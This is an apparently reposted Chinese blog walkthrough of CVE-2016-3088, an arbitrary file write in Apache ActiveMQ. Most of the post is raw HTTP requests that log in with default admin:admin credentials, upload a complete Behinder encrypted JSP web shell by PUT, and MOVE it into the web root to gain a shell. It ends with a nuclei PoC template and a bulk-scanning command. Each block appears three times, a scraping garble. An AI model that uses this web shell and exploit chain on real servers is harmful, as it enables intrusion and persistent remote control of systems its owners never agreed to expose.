CVE-2016-3088 任意文件写入漏洞

0986

本文转载于公众号:融云攻防实验室,原文地址:

漏洞复现 CVE-2016-3088 任意文件写入漏洞

0x01 阅读须知

资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明

0x02 漏洞描述

Apache ActiveMQ是由美国阿帕奇(Apache)软件基金会开发的开源消息中间件,支持Java消息服务、集群、Spring框架等。属于消息队列组件(消息队列组件:分布式系统中的重要组件,主要解决应用耦合、异步消息、流量削峰等)。

    此漏洞出现在Fileserver应用程序中,该漏洞的原理实际上非常简单,即文件服务器支持写入文件(但不解析JSP),同时支持移动文件(MOVE请求)。因此,我们只需要编写一个文件,然后使用移动请求将其移动到任何位置,就会导致任意文件写入漏洞。

图片[1]-CVE-2016-3088 任意文件写入漏洞-安全小天地

0x03 漏洞复现

漏洞版本:

  • ActiveMQ在5.14.0之前的版本(不包括5.14.0)

1.默认密码admin:admin登录,并且在fileserver目录使用put方法上传ry.txt冰蝎马,回显204证明上传成功(注意要加Authorization:认证参数)

PUT /fileserver/ry.txt HTTP/1.1
Host: x.x.x.x:64252
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Cookie: 3PNB_2132_saltkey=LM0s1m1l; 3PNB_2132_lastvisit=1652362564
Upgrade-Insecure-Requests: 1
Content-Length: 612
<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
PUT /fileserver/ry.txt HTTP/1.1
Host: x.x.x.x:64252
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Cookie: 3PNB_2132_saltkey=LM0s1m1l; 3PNB_2132_lastvisit=1652362564
Upgrade-Insecure-Requests: 1
Content-Length: 612

<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
PUT /fileserver/ry.txt HTTP/1.1
Host: x.x.x.x:64252
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Cookie: 3PNB_2132_saltkey=LM0s1m1l; 3PNB_2132_lastvisit=1652362564
Upgrade-Insecure-Requests: 1
Content-Length: 612

<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
图片[2]-CVE-2016-3088 任意文件写入漏洞-安全小天地

2. 通过MOVE方法移动ry.txt冰蝎马到api页面的ry.jsp文件中

MOVE /fileserver/ry.txt HTTP/1.1
Host: x.x.x.x:64252
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Destination: file:///opt/activemq/webapps/api/ry.jsp
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: 3PNB_2132_saltkey=LM0s1m1l; 3PNB_2132_lastvisit=1652362564
Upgrade-Insecure-Requests: 1
MOVE /fileserver/ry.txt HTTP/1.1
Host: x.x.x.x:64252
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Destination: file:///opt/activemq/webapps/api/ry.jsp
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: 3PNB_2132_saltkey=LM0s1m1l; 3PNB_2132_lastvisit=1652362564
Upgrade-Insecure-Requests: 1

MOVE /fileserver/ry.txt HTTP/1.1
Host: x.x.x.x:64252
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Destination: file:///opt/activemq/webapps/api/ry.jsp
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: 3PNB_2132_saltkey=LM0s1m1l; 3PNB_2132_lastvisit=1652362564
Upgrade-Insecure-Requests: 1
图片[3]-CVE-2016-3088 任意文件写入漏洞-安全小天地

3. 冰蝎连接,得到一个shell

图片[4]-CVE-2016-3088 任意文件写入漏洞-安全小天地

4.nuclei已经集成该漏洞脚本(nuclei稳定快,编写poc简单,有社区维护,推荐使用)

nuclei下载地址:https://github.com/projectdiscovery/nuclei

批量验证命令:
nuclei -t cves/2016/CVE-2016-3088.yaml -list urls.txt
yaml POC:
id: CVE-2016-3088
info:
  name: Apache ActiveMQ Fileserver - Arbitrary File Write
  author: fq_hsu
  severity: critical
  description: Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application.
  reference:
    - https://www.exploit-db.com/exploits/40857
    - https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30
    - http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt
    - https://nvd.nist.gov/vuln/detail/CVE-2016-3088
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-3088
    cwe-id: CWE-20
  tags: fileupload,cve,cve2016,apache,activemq
requests:
  - raw:
      - |
        PUT /fileserver/test.txt HTTP/1.1
        Host: {{Hostname}}
        {{randstr}}
  - raw:
      - |
        GET /fileserver/test.txt HTTP/1.1
        Host: {{Hostname}}
    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - \"status_code_1==204\"
          - \"status_code_2==200\"
          - \"contains((body_2), \'{{randstr}}\')\"
        condition: and
批量验证命令:
nuclei -t cves/2016/CVE-2016-3088.yaml -list urls.txt

yaml POC:
id: CVE-2016-3088

info:
  name: Apache ActiveMQ Fileserver - Arbitrary File Write
  author: fq_hsu
  severity: critical
  description: Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application.
  reference:
    - https://www.exploit-db.com/exploits/40857
    - https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30
    - http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt
    - https://nvd.nist.gov/vuln/detail/CVE-2016-3088
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-3088
    cwe-id: CWE-20
  tags: fileupload,cve,cve2016,apache,activemq

requests:
  - raw:
      - |
        PUT /fileserver/test.txt HTTP/1.1
        Host: {{Hostname}}

        {{randstr}}

  - raw:
      - |
        GET /fileserver/test.txt HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - \"status_code_1==204\"
          - \"status_code_2==200\"
          - \"contains((body_2), \'{{randstr}}\')\"
        condition: and
批量验证命令:
nuclei -t cves/2016/CVE-2016-3088.yaml -list urls.txt

yaml POC:
id: CVE-2016-3088

info:
  name: Apache ActiveMQ Fileserver - Arbitrary File Write
  author: fq_hsu
  severity: critical
  description: Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application.
  reference:
    - https://www.exploit-db.com/exploits/40857
    - https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30
    - http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt
    - https://nvd.nist.gov/vuln/detail/CVE-2016-3088
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-3088
    cwe-id: CWE-20
  tags: fileupload,cve,cve2016,apache,activemq

requests:
  - raw:
      - |
        PUT /fileserver/test.txt HTTP/1.1
        Host: {{Hostname}}

        {{randstr}}

  - raw:
      - |
        GET /fileserver/test.txt HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - \"status_code_1==204\"
          - \"status_code_2==200\"
          - \"contains((body_2), \'{{randstr}}\')\"
        condition: and
------本文已结束,感谢您的阅读------
THE END
技术教程
# 漏洞复现# 漏洞# cve# CVE-2016-3088# 任意文件写入
喜欢就支持一下吧
点赞6 分享
Sometimes, you have to make your own happy ending.
有时候,只能靠自己书写自己的美好结局
C语言教程的头像,网络安全爱好者中心-神域博客网
相关推荐
评论 抢沙发

请登录后发表评论

    暂无评论内容

文章目录
文章目录